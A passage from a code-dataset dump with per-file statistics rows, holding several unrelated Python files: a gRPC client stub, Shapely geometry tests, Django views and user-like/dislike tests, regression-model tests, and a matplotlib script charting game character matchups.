return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/DownloadDataset',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.DownloadDatasetResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetDatabases(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetDatabases',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetDatabasesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetTables(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/GetTables',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.GetTablesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ExecuteSql(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/github.com.metaprov.modelaapi.services.dataset.v1.DatasetService/ExecuteSql',
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlRequest.SerializeToString,
github_dot_com_dot_metaprov_dot_modelaapi_dot_services_dot_dataset_dot_v1_dot_dataset__pb2.ExecuteSqlResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 61.918871
| 178
| 0.7406
| 3,656
| 35,108
| 6.594365
| 0.045678
| 0.080468
| 0.048281
| 0.060351
| 0.910075
| 0.910075
| 0.910075
| 0.883073
| 0.878469
| 0.855573
| 0
| 0.008184
| 0.199499
| 35,108
| 566
| 179
| 62.028269
| 0.849666
| 0.037171
| 0
| 0.520325
| 1
| 0
| 0.105996
| 0.077634
| 0
| 0
| 0
| 0
| 0
| 1
| 0.069106
| false
| 0
| 0.004065
| 0.03252
| 0.111789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90ad40c21bdc1c3036ceb16c8453d894f88af372
| 7,473
|
py
|
Python
|
tests/test_create_inconsistent_dimensionality.py
|
chadwhawkins/Shapely
|
73626bce8e99b3f251ad874a41d97d2384e734ce
|
[
"BSD-3-Clause"
] | 1
|
2020-08-24T14:38:08.000Z
|
2020-08-24T14:38:08.000Z
|
tests/test_create_inconsistent_dimensionality.py
|
chadwhawkins/Shapely
|
73626bce8e99b3f251ad874a41d97d2384e734ce
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_create_inconsistent_dimensionality.py
|
chadwhawkins/Shapely
|
73626bce8e99b3f251ad874a41d97d2384e734ce
|
[
"BSD-3-Clause"
] | null | null | null |
"""
When a "context" passed to shape/asShape has a coordinate
which is missing a dimension we should raise a descriptive error.
When we use mixed dimensions in a WKT geometry, the parser strips
any dimension which is not present in every coordinate.
"""
import pytest
from shapely import wkt
from shapely.geometry import shape, LineString, Polygon
geojson_cases = [
{"type": "LineString", "coordinates": [[1, 1, 1], [2, 2]]},
# Specific test case from #869
{"type": "Polygon", "coordinates": [[[55.12916764533149, 24.980385694214384, 2.5], [55.13098248044217, 24.979828079961905], [55.13966519231666, 24.97801442415322], [55.13966563924936, 24.97801442415322], [55.14139286840762, 24.982307444496097], [55.14169331277646, 24.983717465495562], [55.14203489144224, 24.985419446276566, 2.5], [55.14180327151276, 24.98428602667792, 2.5], [55.14170091915952, 24.984242720177235, 2.5], [55.14122966992623, 24.984954809433702, 2.5], [55.14134021791831, 24.985473928648396, 2.5], [55.141405876161286, 24.986090184809793, 2.5], [55.141361358941225, 24.986138101357326, 2.5], [55.14093322994411, 24.986218753894093, 2.5], [55.140897653420964, 24.986214283545635, 2.5], [55.14095492976058, 24.9863027591922, 2.5], [55.140900447388745, 24.98628436557094, 2.5], [55.140867059473706, 24.98628869622101, 2.5], [55.14089155325796, 24.986402364143782, 2.5], [55.14090938808566, 24.986479011993385, 2.5], [55.140943893587824, 24.986471188883584, 2.5], [55.1410161176551, 24.9864174050037, 2.5], [55.140996932409635, 24.986521806266644, 2.5], [55.14163554031332, 24.986910400619593, 2.5], [55.14095781686062, 24.987033474900578, 2.5], [55.14058258698692, 24.98693261266349, 2.5], [55.14032624044253, 24.98747538747211, 2.5], [55.14007240846915, 24.988001119077232, 2.5], [55.14013122149105, 24.98831115636925, 2.5], [55.13991827457961, 24.98834356639557, 2.5], [55.139779460946755, 24.988254625087706, 2.5], [55.13974742344948, 24.988261377176524, 2.5], [55.139515198160304, 24.98841811876934, 2.5], [55.13903617238334, 24.98817914139135, 2.5], [55.1391330764994, 24.988660542040925, 2.5], [55.13914369357698, 24.989438289540374, 2.5], [55.136431216517785, 24.98966711550207, 2.0], [55.13659028641709, 24.99041706302204, 2.0], [55.1355852030721, 24.990933481401207, 2.5], [55.13535549235394, 24.99110470506038, 2.5], [55.13512578163577, 24.99127592871955, 2.5], [55.129969653784556, 24.991440074326995, 2.5], [55.130221623112746, 24.988070688875112, 2.5], [55.130451333830905, 24.98789946521594, 2.5], [55.13089208224919, 24.98742639990359, 2.5], [55.132177586827666, 24.989003408454433, 2.5], [55.13238862452779, 24.988701566801254, 2.5], [55.132482594977674, 24.988501518707757, 2.5], [55.132525994610624, 24.988048802794115, 2.5], [55.13249018525683, 24.987180623870653, 2.5], [55.13253358488978, 24.986727907957015, 2.5], [55.1322761673244, 24.985827132742713, 2.5], [55.13163341503516, 24.98503862846729, 2.5], [55.131514764536504, 24.984469124700183, 2.5], [55.131275600894, 24.983796337257242, 2.0], [55.13066865795855, 24.98387601190528, 2.0], [55.13026930682963, 24.981537228037503, 2.0], [55.130260412698846, 24.981495691049748, 2.0], [55.13025151856806, 24.981454154061993, 2.0], [55.13022925995803, 24.98096497686874, 2.5], [55.12984453059386, 24.9804285816199, 2.5], [55.129998291954365, 24.98021419115843, 2.5], [55.12916764533149, 24.980385694214384, 2.5]]]},
]
direct_cases = [
(LineString, [[[0, 0, 0], [1, 1]]]),
(Polygon, [[[0, 0, 0], [1, 1, 0], [1, 1], [0, 1, 0], [0, 0, 0]]]),
# Specific test case from #869
(Polygon, [[[55.12916764533149, 24.980385694214384, 2.5], [55.13098248044217, 24.979828079961905], [55.13966519231666, 24.97801442415322], [55.13966563924936, 24.97801442415322], [55.14139286840762, 24.982307444496097], [55.14169331277646, 24.983717465495562], [55.14203489144224, 24.985419446276566, 2.5], [55.14180327151276, 24.98428602667792, 2.5], [55.14170091915952, 24.984242720177235, 2.5], [55.14122966992623, 24.984954809433702, 2.5], [55.14134021791831, 24.985473928648396, 2.5], [55.141405876161286, 24.986090184809793, 2.5], [55.141361358941225, 24.986138101357326, 2.5], [55.14093322994411, 24.986218753894093, 2.5], [55.140897653420964, 24.986214283545635, 2.5], [55.14095492976058, 24.9863027591922, 2.5], [55.140900447388745, 24.98628436557094, 2.5], [55.140867059473706, 24.98628869622101, 2.5], [55.14089155325796, 24.986402364143782, 2.5], [55.14090938808566, 24.986479011993385, 2.5], [55.140943893587824, 24.986471188883584, 2.5], [55.1410161176551, 24.9864174050037, 2.5], [55.140996932409635, 24.986521806266644, 2.5], [55.14163554031332, 24.986910400619593, 2.5], [55.14095781686062, 24.987033474900578, 2.5], [55.14058258698692, 24.98693261266349, 2.5], [55.14032624044253, 24.98747538747211, 2.5], [55.14007240846915, 24.988001119077232, 2.5], [55.14013122149105, 24.98831115636925, 2.5], [55.13991827457961, 24.98834356639557, 2.5], [55.139779460946755, 24.988254625087706, 2.5], [55.13974742344948, 24.988261377176524, 2.5], [55.139515198160304, 24.98841811876934, 2.5], [55.13903617238334, 24.98817914139135, 2.5], [55.1391330764994, 24.988660542040925, 2.5], [55.13914369357698, 24.989438289540374, 2.5], [55.136431216517785, 24.98966711550207, 2.0], [55.13659028641709, 24.99041706302204, 2.0], [55.1355852030721, 24.990933481401207, 2.5], [55.13535549235394, 24.99110470506038, 2.5], [55.13512578163577, 24.99127592871955, 2.5], [55.129969653784556, 24.991440074326995, 2.5], [55.130221623112746, 24.988070688875112, 2.5], [55.130451333830905, 24.98789946521594, 2.5], [55.13089208224919, 24.98742639990359, 2.5], [55.132177586827666, 24.989003408454433, 2.5], [55.13238862452779, 24.988701566801254, 2.5], [55.132482594977674, 24.988501518707757, 2.5], [55.132525994610624, 24.988048802794115, 2.5], [55.13249018525683, 24.987180623870653, 2.5], [55.13253358488978, 24.986727907957015, 2.5], [55.1322761673244, 24.985827132742713, 2.5], [55.13163341503516, 24.98503862846729, 2.5], [55.131514764536504, 24.984469124700183, 2.5], [55.131275600894, 24.983796337257242, 2.0], [55.13066865795855, 24.98387601190528, 2.0], [55.13026930682963, 24.981537228037503, 2.0], [55.130260412698846, 24.981495691049748, 2.0], [55.13025151856806, 24.981454154061993, 2.0], [55.13022925995803, 24.98096497686874, 2.5], [55.12984453059386, 24.9804285816199, 2.5], [55.129998291954365, 24.98021419115843, 2.5], [55.12916764533149, 24.980385694214384, 2.5]]]),
]
wkt_cases = [
('LINESTRING (1 1 1, 2 2)', 'LINESTRING (1.0000000000000000 1.0000000000000000, 2.0000000000000000 2.0000000000000000)'),
('POLYGON ((0 0 0, 1 0 0, 1 1, 0 1 0, 0 0 0))', 'POLYGON ((0.0000000000000000 0.0000000000000000, 1.0000000000000000 0.0000000000000000, 1.0000000000000000 1.0000000000000000, 0.0000000000000000 1.0000000000000000, 0.0000000000000000 0.0000000000000000))')
]
@pytest.mark.parametrize('geojson', geojson_cases)
def test_create_from_geojson(geojson):
with pytest.raises(ValueError) as exc:
wkt = shape(geojson).wkt
assert exc.match("Inconsistent coordinate dimensionality")
@pytest.mark.parametrize('constructor, args', direct_cases)
def test_create_directly(constructor, args):
with pytest.raises(ValueError) as exc:
geom = constructor(*args)
assert exc.match("Inconsistent coordinate dimensionality")
@pytest.mark.parametrize('wkt_geom,expected', wkt_cases)
def test_create_from_wkt(wkt_geom, expected):
geom = wkt.loads(wkt_geom)
assert geom.wkt == expected
| 135.872727
| 2,902
| 0.748294
| 972
| 7,473
| 5.735597
| 0.200617
| 0.036592
| 0.071749
| 0.023677
| 0.872646
| 0.850404
| 0.838386
| 0.811121
| 0.811121
| 0.782422
| 0
| 0.681672
| 0.087381
| 7,473
| 54
| 2,903
| 138.388889
| 0.135777
| 0.040546
| 0
| 0.133333
| 0
| 0.066667
| 0.073195
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
90f3b675a66ee395237b0cbd6c262be39514aed5
| 147
|
py
|
Python
|
app/main_page/views.py
|
JONGSKY/patent_search
|
0892663d7332132da3713a846ff5a37ed2c51536
|
[
"MIT"
] | 3
|
2020-12-14T14:06:04.000Z
|
2020-12-29T02:22:28.000Z
|
app/main_page/views.py
|
JONGSKY/patent_search
|
0892663d7332132da3713a846ff5a37ed2c51536
|
[
"MIT"
] | 5
|
2020-11-25T08:47:24.000Z
|
2020-12-18T09:07:17.000Z
|
app/main_page/views.py
|
JONGSKY/patent_search
|
0892663d7332132da3713a846ff5a37ed2c51536
|
[
"MIT"
] | 2
|
2020-11-24T10:09:18.000Z
|
2021-04-28T15:59:15.000Z
|
from django.shortcuts import render
# Create your views here.
def main_page(request):
return render(request, 'main_page/main_page.html')
| 24.5
| 54
| 0.748299
| 21
| 147
| 5.095238
| 0.714286
| 0.224299
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163265
| 147
| 6
| 54
| 24.5
| 0.869919
| 0.156463
| 0
| 0
| 0
| 0
| 0.20339
| 0.20339
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
293961e5ab195bca63050351c25bf58627a6c75b
| 1,527
|
py
|
Python
|
tests/test_model.py
|
cbbruss/frustanet
|
8b08470ba3165012b58d9424ea985895e1324c26
|
[
"Unlicense",
"MIT"
] | null | null | null |
tests/test_model.py
|
cbbruss/frustanet
|
8b08470ba3165012b58d9424ea985895e1324c26
|
[
"Unlicense",
"MIT"
] | null | null | null |
tests/test_model.py
|
cbbruss/frustanet
|
8b08470ba3165012b58d9424ea985895e1324c26
|
[
"Unlicense",
"MIT"
] | null | null | null |
# Testing Model
import torch
import numpy as np
from frustanet.model import FrustaNetRegression
# Tests with just linear model
def test_forward():
net = FrustaNetRegression(n_features=10)
x = torch.randn(2, 10)
out = net(x)
assert out[0].shape[1] == 1
def test_training_step():
net = FrustaNetRegression(n_features=10)
x = torch.randn(2, 10)
y = torch.randn(2, 1)
loss = net.training_step((x, y), 0)
assert loss > 0
def test_validation_step():
net = FrustaNetRegression(n_features=10)
x = torch.randn(2, 10)
y = torch.randn(2, 1)
loss = net.validation_step((x, y), 0)
print(loss)
assert loss > 0
# Tests with non-linear model
def test_forward_nonlinear():
net = FrustaNetRegression(n_features=10, n_estimators=5)
x = torch.randn(2, 10)
out = net(x)
assert out[0].shape[1] == 1
def test_training_step_nonlinear():
net = FrustaNetRegression(n_features=10, n_estimators=5)
x = torch.randn(2, 10)
y = torch.randn(2, 1)
loss = net.training_step((x, y), 0)
assert loss > 0
def test_validation_step_nonlinear():
net = FrustaNetRegression(n_features=10, n_estimators=5)
x = torch.randn(2, 10)
y = torch.randn(2, 1)
loss = net.validation_step((x, y), 0)
assert loss > 0
def test_predict():
net = FrustaNetRegression(n_features=10, n_estimators=5)
x = torch.randn(2, 10)
y = torch.randn(2, 1)
preds = net.predict(x)
mse = torch.mean((preds - y) ** 2)
assert len(preds) == 2
assert mse
| 26.327586
| 60
| 0.654879
| 234
| 1,527
| 4.149573
| 0.188034
| 0.123584
| 0.135942
| 0.223481
| 0.802266
| 0.750772
| 0.750772
| 0.750772
| 0.750772
| 0.732235
| 0
| 0.054302
| 0.21611
| 1,527
| 58
| 61
| 26.327586
| 0.756892
| 0.045842
| 0
| 0.673913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 1
| 0.152174
| false
| 0
| 0.065217
| 0
| 0.217391
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2965d4b4dab84814440b0c57c3e0be9eece50537
| 6,673
|
py
|
Python
|
users/tests.py
|
jtkim03/Find-a-QT
|
a330c95f76bcc148febf39284c07d3ac4f909b4e
|
[
"BSD-3-Clause"
] | null | null | null |
users/tests.py
|
jtkim03/Find-a-QT
|
a330c95f76bcc148febf39284c07d3ac4f909b4e
|
[
"BSD-3-Clause"
] | 9
|
2021-03-30T13:42:35.000Z
|
2022-03-12T00:36:19.000Z
|
users/tests.py
|
jtkim03/Find-a-QT
|
a330c95f76bcc148febf39284c07d3ac4f909b4e
|
[
"BSD-3-Clause"
] | null | null | null |
from django.test import TestCase
from .models import Profile, Like, Dislike
from django.contrib.auth.models import User
# Create your tests here.
""" Tests if updating a Profile works correctly """
class ChangeProfileTest(TestCase):
def setUp(self):
self.test_user = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
def test_str(self):
test_user = self.test_user
test_profile = Profile.objects.get(user=test_user)
test_profile.bio = "I am a student at the University of Virginia"
test_profile.save()
self.assertEqual(test_profile.bio, "I am a student at the University of Virginia")
""" Tests the string function of the Like model """
class LikeStrTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
test_like, created = Like.objects.get_or_create(current_user=test_user_one)
test_like.users.add(test_user_two)
test_like_dos, created = Like.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_like_dos), "JoshD is liked by 1 users!")
""" Tests the give_like function of the Dislike model """
class GiveLikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
Like.give_like(test_user_one, test_user_two)
test_like, created = Like.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_like), "JoshD is liked by 1 users!")
""" Tests the string function of the Dislike model """
class DislikeStrTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
test_dislike, created = Dislike.objects.get_or_create(current_user=test_user_one)
test_dislike.users.add(test_user_two)
test_dislike_dos, created = Dislike.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_dislike_dos), "JoshD is disliked by 1 users!")
""" Tests the give_dislike function of the Dislike model """
class GiveDislikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
Dislike.give_dislike(test_user_one, test_user_two)
test_dislike, created = Dislike.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_dislike), "JoshD is disliked by 1 users!")
""" Tests after liking another User, if there had been a previous dislike from
current user to the liked user, the dislike is removed."""
class RemoveDislikeIfLikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
Dislike.give_dislike(test_user_one, test_user_two)
Like.give_like(test_user_one, test_user_two)
test_dislike, created = Dislike.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_dislike), "JoshD is disliked by 0 users!")
""" Tests after disliking another User, if there had been a previous like from
current user to the disliked user, the like is removed."""
class RemoveLikeIfDislikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
Like.give_like(test_user_one, test_user_two)
Dislike.give_dislike(test_user_one, test_user_two)
test_like, created = Like.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_like), "JoshD is liked by 0 users!")
""" Tests if no more than one like can be made from one user to another """
class OnlyOneLikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
Like.give_like(test_user_one, test_user_two)
Like.give_like(test_user_one, test_user_two)
Like.give_like(test_user_one, test_user_two)
Like.give_like(test_user_one, test_user_two)
Like.give_like(test_user_one, test_user_two)
test_like, created = Like.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_like), "JoshD is liked by 1 users!")
""" Tests if no more than one dislike can be made from one user to another """
class OnlyOneDislikeTest(TestCase):
def setUp(self):
self.test_user_one = User.objects.create_user('JohnD', 'johnd@mail.com', 'johnpassword')
self.test_user_two = User.objects.create_user('JoshD', 'joshd@mail.com', 'joshpassword')
def test_str(self):
test_user_one = self.test_user_one
test_user_two = self.test_user_two
Dislike.give_dislike(test_user_one, test_user_two)
Dislike.give_dislike(test_user_one, test_user_two)
Dislike.give_dislike(test_user_one, test_user_two)
Dislike.give_dislike(test_user_one, test_user_two)
Dislike.give_dislike(test_user_one, test_user_two)
test_dislike, created = Dislike.objects.get_or_create(current_user=test_user_two)
self.assertEqual(str(test_dislike), "JoshD is disliked by 1 users!")
| 51.728682
| 96
| 0.719916
| 983
| 6,673
| 4.592065
| 0.089522
| 0.170137
| 0.121843
| 0.086398
| 0.875277
| 0.863979
| 0.819229
| 0.795968
| 0.774036
| 0.747895
| 0
| 0.001456
| 0.176682
| 6,673
| 128
| 97
| 52.132813
| 0.820167
| 0.003447
| 0
| 0.730769
| 0
| 0
| 0.140572
| 0
| 0
| 0
| 0
| 0
| 0.086538
| 1
| 0.173077
| false
| 0.163462
| 0.028846
| 0
| 0.288462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
463205a22e0f79a420196e3a5a9a4536c4ab25c9
| 5,225
|
py
|
Python
|
metagame_character_results.py
|
RPGLite/analysis
|
13f683beb26d77c6f7ae7de54808b0cb5acb9eee
|
[
"MIT"
] | null | null | null |
metagame_character_results.py
|
RPGLite/analysis
|
13f683beb26d77c6f7ae7de54808b0cb5acb9eee
|
[
"MIT"
] | 1
|
2020-11-27T14:38:33.000Z
|
2020-11-27T14:38:33.000Z
|
metagame_character_results.py
|
RPGLite/analysis
|
13f683beb26d77c6f7ae7de54808b0cb5acb9eee
|
[
"MIT"
] | null | null | null |
from helper_fns import *
import numpy as np
import matplotlib.pyplot as plt
import math, pymongo
from bson import objectid
results = np.array([[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0]])
for g in db.completed_games.find({"winner":{"$exists":True}, "balance_code":"1.2"}):
if g["winner"] == 1:
results[chars.index(g["p1c1"][0])][chars.index(g["p2c1"][0])] += 1
results[chars.index(g["p1c1"][0])][chars.index(g["p2c2"][0])] += 1
results[chars.index(g["p1c2"][0])][chars.index(g["p2c1"][0])] += 1
results[chars.index(g["p1c2"][0])][chars.index(g["p2c2"][0])] += 1
else:
results[chars.index(g["p2c1"][0])][chars.index(g["p1c1"][0])] += 1
results[chars.index(g["p2c1"][0])][chars.index(g["p1c2"][0])] += 1
results[chars.index(g["p2c2"][0])][chars.index(g["p1c1"][0])] += 1
results[chars.index(g["p2c2"][0])][chars.index(g["p1c2"][0])] += 1
ratios = np.array([[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0]])
for r in range(len(results)):
for c in range(len(results[r])):
ratios[r][c] = results[r][c] / (results[r][c] + results[c][r])
fig, (ax,ax2) = plt.subplots(1,2, sharey=True, figsize=(16,10), gridspec_kw={'width_ratios': [3, 1]})
im = ax.imshow(ratios)
ax.set_xticks(np.arange(8))
ax.set_yticks(np.arange(8))
ax.set_yticklabels([full_name(c) for c in chars])
ax.set_xticklabels(chars)
for i in range(8):
for j in range(8):
text = ax.text(j, i, "{:.2f}".format(ratios[i, j]),
ha="center", va="center", color="w" if ratios[i,j] < 0.51 else "b")
times_played = np.array([[0],[0],[0],[0],[0],[0],[0],[0]])
for c in range(8):
times_played[c] = [sum(results[c])]
ax.set_title("s2-matchups")
ax2.set_title("s2-times played")
ax2.set_xticks([0]) # turn xticks off for popularity
ax2.set_xticklabels(["# played"])
im2 = ax2.imshow(times_played)
for j in range(8):
text = ax2.text(0, j, times_played[j, 0],
ha="center", va="center", color="w" if times_played[j,0] < np.average([times_played[x][0] for x in range(8)]) else "b")
results = np.array([[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0]])
for g in db.completed_games.find({"winner":{"$exists":True}, "balance_code":{"$exists":False}}):
if g["winner"] == 1:
results[chars.index(g["p1c1"][0])][chars.index(g["p2c1"][0])] += 1
results[chars.index(g["p1c1"][0])][chars.index(g["p2c2"][0])] += 1
results[chars.index(g["p1c2"][0])][chars.index(g["p2c1"][0])] += 1
results[chars.index(g["p1c2"][0])][chars.index(g["p2c2"][0])] += 1
else:
results[chars.index(g["p2c1"][0])][chars.index(g["p1c1"][0])] += 1
results[chars.index(g["p2c1"][0])][chars.index(g["p1c2"][0])] += 1
results[chars.index(g["p2c2"][0])][chars.index(g["p1c1"][0])] += 1
results[chars.index(g["p2c2"][0])][chars.index(g["p1c2"][0])] += 1
ratios = np.array([[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0],
[.0,.0,.0,.0,.0,.0,.0,.0]])
for r in range(len(results)):
for c in range(len(results[r])):
ratios[r][c] = results[r][c] / (results[r][c] + results[c][r])
fig2, (_ax,_ax2) = plt.subplots(1,2, sharey=True, figsize=(16,10), gridspec_kw={'width_ratios': [3, 1]})
im = _ax.imshow(ratios)
_ax.set_xticks(np.arange(8))
_ax.set_yticks(np.arange(8))
_ax.set_yticklabels([full_name(c) for c in chars])
_ax.set_xticklabels(chars)
for i in range(8):
for j in range(8):
text = _ax.text(j, i, "{:.2f}".format(ratios[i, j]),
ha="center", va="center", color="w" if ratios[i,j] < 0.51 else "b")
times_played = np.array([[0],[0],[0],[0],[0],[0],[0],[0]])
for c in range(8):
times_played[c] = [sum(results[c])]
_ax.set_title("s1-matchups")
_ax2.set_title("s1-times played")
_ax2.set_xticks([0]) # turn xticks off for popularity
_ax2.set_xticklabels(["# played"])
im2 = _ax2.imshow(times_played)
for j in range(8):
text = _ax2.text(0, j, times_played[j, 0],
ha="center", va="center", color="w" if times_played[j,0] < np.average([times_played[x][0] for x in range(8)]) else "b")
plt.tight_layout()
plt.show()
| 39.285714
| 142
| 0.493206
| 917
| 5,225
| 2.751363
| 0.10578
| 0.21086
| 0.309156
| 0.402695
| 0.925882
| 0.925882
| 0.925882
| 0.925882
| 0.925882
| 0.925882
| 0
| 0.114236
| 0.237703
| 5,225
| 133
| 143
| 39.285714
| 0.519207
| 0.011675
| 0
| 0.678899
| 0
| 0
| 0.06974
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.045872
| 0
| 0.045872
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4672efe88ee10b0cf6d782d73fdeca994d616001
| 6,848
|
py
|
Python
|
exercises/practice/grade-school/grade_school_test.py
|
tamireinhorn/python
|
027e94759dd3281b0633c82171e377a28dc5a92e
|
[
"MIT"
] | 1,177
|
2017-06-21T20:24:06.000Z
|
2022-03-29T02:30:55.000Z
|
exercises/practice/grade-school/grade_school_test.py
|
tamireinhorn/python
|
027e94759dd3281b0633c82171e377a28dc5a92e
|
[
"MIT"
] | 1,890
|
